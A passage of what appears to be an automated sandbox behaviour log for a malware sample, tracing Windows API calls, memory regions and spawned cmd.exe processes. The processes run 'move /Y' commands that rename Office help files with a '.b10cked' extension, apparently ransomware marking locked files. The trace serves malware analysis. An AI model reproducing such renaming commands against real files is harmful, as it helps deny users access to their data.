out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0201.447] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0201.447] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0201.447] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0201.448] 
_wcsicmp (_String1="move", _String2="TYPE") returned -7 [0201.448] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0201.448] _wcsicmp (_String1="move", _String2="CD") returned 10 [0201.448] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0201.448] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0201.448] _wcsicmp (_String1="move", _String2="REN") returned -5 [0201.448] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0201.448] _wcsicmp (_String1="move", _String2="SET") returned -6 [0201.448] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0201.448] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0201.448] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0201.448] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0201.448] _wcsicmp (_String1="move", _String2="MD") returned 11 [0201.448] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0201.448] _wcsicmp (_String1="move", _String2="RD") returned -5 [0201.448] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0201.448] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0201.448] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0201.448] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0201.448] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0201.448] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0201.448] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0201.448] _wcsicmp (_String1="move", _String2="VER") returned -9 [0201.448] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0201.448] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0201.448] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0201.448] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0201.448] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0201.448] _wcsicmp (_String1="move", _String2="START") returned -6 [0201.448] _wcsicmp (_String1="move", _String2="DPATH") 
returned 9 [0201.448] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0201.448] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0201.450] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0201.450] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0201.450] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2af4ec, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x2af4e4, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2af4e4*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0201.451] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0201.451] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0201.451] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0201.451] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0201.451] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0201.451] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0201.451] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0201.451] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0201.451] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0201.451] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0201.451] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0201.451] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0201.451] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0201.451] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0201.451] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", 
_MaxCount=0x7) returned -13 [0201.451] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0201.451] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0201.451] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0201.451] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0201.451] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0201.451] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0201.451] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0201.451] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0201.451] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0201.451] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0201.451] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0201.451] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0201.451] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0201.451] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0201.452] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0201.452] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0201.452] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0201.475] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0201.476] _wcsicmp (_String1="MSMSPU~1.HXN", _String2=".") returned 63 [0201.476] _wcsicmp (_String1="MSMSPU~1.HXN", _String2="..") returned 63 [0201.476] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSPU~1.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\msmspu~1.hxn")) returned 0x2022 [0201.476] GetCurrentDirectoryW (in: 
nBufferLength=0x104, lpBuffer=0x331e38 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0201.476] SetErrorMode (uMode=0x0) returned 0x0 [0201.476] SetErrorMode (uMode=0x1) returned 0x0 [0201.476] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSPU~1.HXN", nBufferLength=0x104, lpBuffer=0x2aee74, lpFilePart=0x2aee5c | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSPU~1.HXN", lpFilePart=0x2aee5c*="MSMSPU~1.HXN") returned 0x27 [0201.476] SetErrorMode (uMode=0x0) returned 0x1 [0201.476] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2" (normalized: "c:\\users\\alluse~1\\micros~2")) returned 0x2012 [0201.477] _wcsicmp (_String1="MSMSPU~1.HXN", _String2=".") returned 63 [0201.477] _wcsicmp (_String1="MSMSPU~1.HXN", _String2="..") returned 63 [0201.477] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSPU~1.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\msmspu~1.hxn")) returned 0x2022 [0201.477] SetErrorMode (uMode=0x0) returned 0x0 [0201.477] SetErrorMode (uMode=0x1) returned 0x0 [0201.477] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSPU~1.HXN", nBufferLength=0x104, lpBuffer=0x2af2f0, lpFilePart=0x2af088 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSPU~1.HXN", lpFilePart=0x2af088*="MSMSPU~1.HXN") returned 0x27 [0201.477] SetErrorMode (uMode=0x0) returned 0x1 [0201.477] SetErrorMode (uMode=0x0) returned 0x0 [0201.478] SetErrorMode (uMode=0x1) returned 0x0 [0201.478] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.MSPUB.14.1033.hxn.b10cked", nBufferLength=0x104, lpBuffer=0x2af4f8, lpFilePart=0x2af088 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.MSPUB.14.1033.hxn.b10cked", lpFilePart=0x2af088*="MS.MSPUB.14.1033.hxn.b10cked") returned 0x37 [0201.478] SetErrorMode (uMode=0x0) returned 0x1 [0201.478] SetLastError (dwErrCode=0x0) [0201.478] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.MSPUB.14.1033.hxn.b10cked" (normalized: 
"c:\\users\\alluse~1\\micros~2\\ms.mspub.14.1033.hxn.b10cked")) returned 0xffffffff [0201.478] GetLastError () returned 0x2 [0201.478] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSPU~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x2aea04, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aea04) returned 0x320e68 [0201.478] FindNextFileW (in: hFindFile=0x320e68, lpFindFileData=0x2aea04 | out: lpFindFileData=0x2aea04) returned 0 [0201.479] FindClose (in: hFindFile=0x320e68 | out: hFindFile=0x320e68) returned 1 [0201.479] GetLastError () returned 0x12 [0201.479] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSPU~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x2aea04, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aea04) returned 0x320e68 [0201.479] FindNextFileW (in: hFindFile=0x320e68, lpFindFileData=0x2aea04 | out: lpFindFileData=0x2aea04) returned 0 [0201.479] FindClose (in: hFindFile=0x320e68 | out: hFindFile=0x320e68) returned 1 [0201.479] GetLastError () returned 0x12 [0201.480] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSPU~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x331bd8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x331bd8) returned 0x320e68 [0201.480] FindNextFileW (in: hFindFile=0x320e68, lpFindFileData=0x331bd8 | out: lpFindFileData=0x331bd8) returned 0 [0201.480] FindClose (in: hFindFile=0x320e68 | out: hFindFile=0x320e68) returned 1 [0201.481] GetLastError () returned 0x12 [0201.481] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSPU~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x331bd8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x331bd8) returned 0x320e68 [0201.481] FindNextFileW (in: hFindFile=0x320e68, lpFindFileData=0x331bd8 | out: lpFindFileData=0x331bd8) returned 0 [0201.481] FindClose (in: hFindFile=0x320e68 | out: hFindFile=0x320e68) 
returned 1 [0201.481] GetLastError () returned 0x12 [0201.481] _get_osfhandle (_FileHandle=2) returned 0xb [0201.481] GetFileType (hFile=0xb) returned 0x2 [0201.481] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0201.481] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x2aebd4 | out: lpMode=0x2aebd4) returned 1 [0201.482] _get_osfhandle (_FileHandle=2) returned 0xb [0201.482] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x2aec08 | out: lpConsoleScreenBufferInfo=0x2aec08) returned 1 [0201.482] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0201.483] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x2aec48 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0201.483] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0x2aec2c, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x2aec2c*=0x2c) returned 1 [0201.484] longjmp () [0201.484] _get_osfhandle (_FileHandle=1) returned 0x7 [0201.484] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0201.484] _get_osfhandle (_FileHandle=1) returned 0x7 [0201.484] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0201.484] _get_osfhandle (_FileHandle=0) returned 0x3 [0201.484] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0201.484] SetConsoleInputExeNameW () returned 0x1 [0201.484] GetConsoleOutputCP () returned 0x1b5 [0201.485] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0201.485] SetThreadUILanguage (LangId=0x0) returned 0x409 [0201.485] exit (_Code=1) Process: id = "468" image_name = 
"cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea167e0" os_pid = "0xda4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSPU~2.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.MSPUB.DEV.14.1033.hxn.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 29266 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 29267 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 29268 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 29269 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 29270 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 29271 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 29272 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 
region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 29273 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 29274 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 29275 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 29592 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 29593 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 29594 start_va = 0x150000 end_va = 0x1b6fff entry_point = 0x150000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 29595 start_va = 0x230000 end_va = 0x32ffff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 29596 start_va = 0x520000 end_va = 0x52ffff entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 29597 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 29598 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 29599 start_va = 0x76480000 end_va = 0x76489fff entry_point = 
0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 29600 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 29601 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 29602 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 29603 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 29604 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 29605 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 29646 start_va = 0x330000 end_va = 0x3f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 29647 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 29648 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" 
(normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 29649 start_va = 0x1c0000 end_va = 0x1c6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 29650 start_va = 0x1d0000 end_va = 0x1d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 29651 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 29652 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 29653 start_va = 0x400000 end_va = 0x500fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 29654 start_va = 0x530000 end_va = 0x112ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 29655 start_va = 0x1130000 end_va = 0x1292fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001130000" filename = "" Region: id = 29684 start_va = 0x12a0000 end_va = 0x135ffff entry_point = 0x12a0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Thread: id = 664 os_tid = 0xc78 [0201.699] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12fc14 | out: lpSystemTimeAsFileTime=0x12fc14*(dwLowDateTime=0xad077200, dwHighDateTime=0x1d440a9)) [0201.699] GetCurrentProcessId () returned 0xda4 [0201.699] GetCurrentThreadId () returned 0xc78 [0201.699] GetTickCount () returned 0x38f34 [0201.699] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc0c | out: lpPerformanceCount=0x12fc0c*=25848792766) returned 1 [0201.699] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0201.700] __set_app_type (_Type=0x1) [0201.700] __p__fmode () returned 
0x76b331f4 [0201.700] __p__commode () returned 0x76b331fc [0201.700] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0201.700] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0201.700] GetCurrentThreadId () returned 0xc78 [0201.700] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xc78) returned 0x38 [0201.700] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0201.700] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0201.700] SetThreadUILanguage (LangId=0x0) returned 0x409 [0201.715] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0201.715] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x12fba4 | out: phkResult=0x12fba4*=0x0) returned 0x2 [0201.715] VirtualQuery (in: lpAddress=0x12fbdb, lpBuffer=0x12fb74, dwLength=0x1c | out: lpBuffer=0x12fb74*(BaseAddress=0x12f000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0201.715] VirtualQuery (in: lpAddress=0x30000, lpBuffer=0x12fb74, dwLength=0x1c | out: lpBuffer=0x12fb74*(BaseAddress=0x30000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0201.715] VirtualQuery (in: lpAddress=0x31000, lpBuffer=0x12fb74, dwLength=0x1c | out: lpBuffer=0x12fb74*(BaseAddress=0x31000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0201.715] VirtualQuery (in: lpAddress=0x33000, lpBuffer=0x12fb74, dwLength=0x1c | out: lpBuffer=0x12fb74*(BaseAddress=0x33000, AllocationBase=0x30000, AllocationProtect=0x4, 
RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0201.715] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x12fb74, dwLength=0x1c | out: lpBuffer=0x12fb74*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0201.715] GetConsoleOutputCP () returned 0x1b5 [0201.717] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0201.717] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0201.717] _get_osfhandle (_FileHandle=1) returned 0x7 [0201.717] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0201.719] _get_osfhandle (_FileHandle=1) returned 0x7 [0201.719] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0201.720] _get_osfhandle (_FileHandle=1) returned 0x7 [0201.720] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0201.724] _get_osfhandle (_FileHandle=0) returned 0x3 [0201.724] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0201.726] _get_osfhandle (_FileHandle=0) returned 0x3 [0201.726] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0201.748] GetEnvironmentStringsW () returned 0x240190* [0201.748] FreeEnvironmentStringsW (penv=0x240190) returned 1 [0201.748] GetEnvironmentStringsW () returned 0x240190* [0201.748] FreeEnvironmentStringsW (penv=0x240190) returned 1 [0201.748] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12eb14 | out: phkResult=0x12eb14*=0x40) returned 0x0 [0201.748] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12eb1c, lpData=0x12eb20, lpcbData=0x12eb18*=0x1000 | out: lpType=0x12eb1c*=0x0, lpData=0x12eb20*=0xb8, lpcbData=0x12eb18*=0x1000) returned 0x2 [0201.748] RegQueryValueExW (in: hKey=0x40, 
lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12eb1c, lpData=0x12eb20, lpcbData=0x12eb18*=0x1000 | out: lpType=0x12eb1c*=0x4, lpData=0x12eb20*=0x1, lpcbData=0x12eb18*=0x4) returned 0x0 [0201.748] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12eb1c, lpData=0x12eb20, lpcbData=0x12eb18*=0x1000 | out: lpType=0x12eb1c*=0x0, lpData=0x12eb20*=0x1, lpcbData=0x12eb18*=0x1000) returned 0x2 [0201.748] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12eb1c, lpData=0x12eb20, lpcbData=0x12eb18*=0x1000 | out: lpType=0x12eb1c*=0x4, lpData=0x12eb20*=0x0, lpcbData=0x12eb18*=0x4) returned 0x0 [0201.748] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12eb1c, lpData=0x12eb20, lpcbData=0x12eb18*=0x1000 | out: lpType=0x12eb1c*=0x4, lpData=0x12eb20*=0x40, lpcbData=0x12eb18*=0x4) returned 0x0 [0201.748] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12eb1c, lpData=0x12eb20, lpcbData=0x12eb18*=0x1000 | out: lpType=0x12eb1c*=0x4, lpData=0x12eb20*=0x40, lpcbData=0x12eb18*=0x4) returned 0x0 [0201.749] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12eb1c, lpData=0x12eb20, lpcbData=0x12eb18*=0x1000 | out: lpType=0x12eb1c*=0x0, lpData=0x12eb20*=0x40, lpcbData=0x12eb18*=0x1000) returned 0x2 [0201.749] RegCloseKey (hKey=0x40) returned 0x0 [0201.749] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12eb14 | out: phkResult=0x12eb14*=0x40) returned 0x0 [0201.749] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12eb1c, lpData=0x12eb20, lpcbData=0x12eb18*=0x1000 | out: lpType=0x12eb1c*=0x0, lpData=0x12eb20*=0x40, lpcbData=0x12eb18*=0x1000) returned 0x2 [0201.749] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12eb1c, 
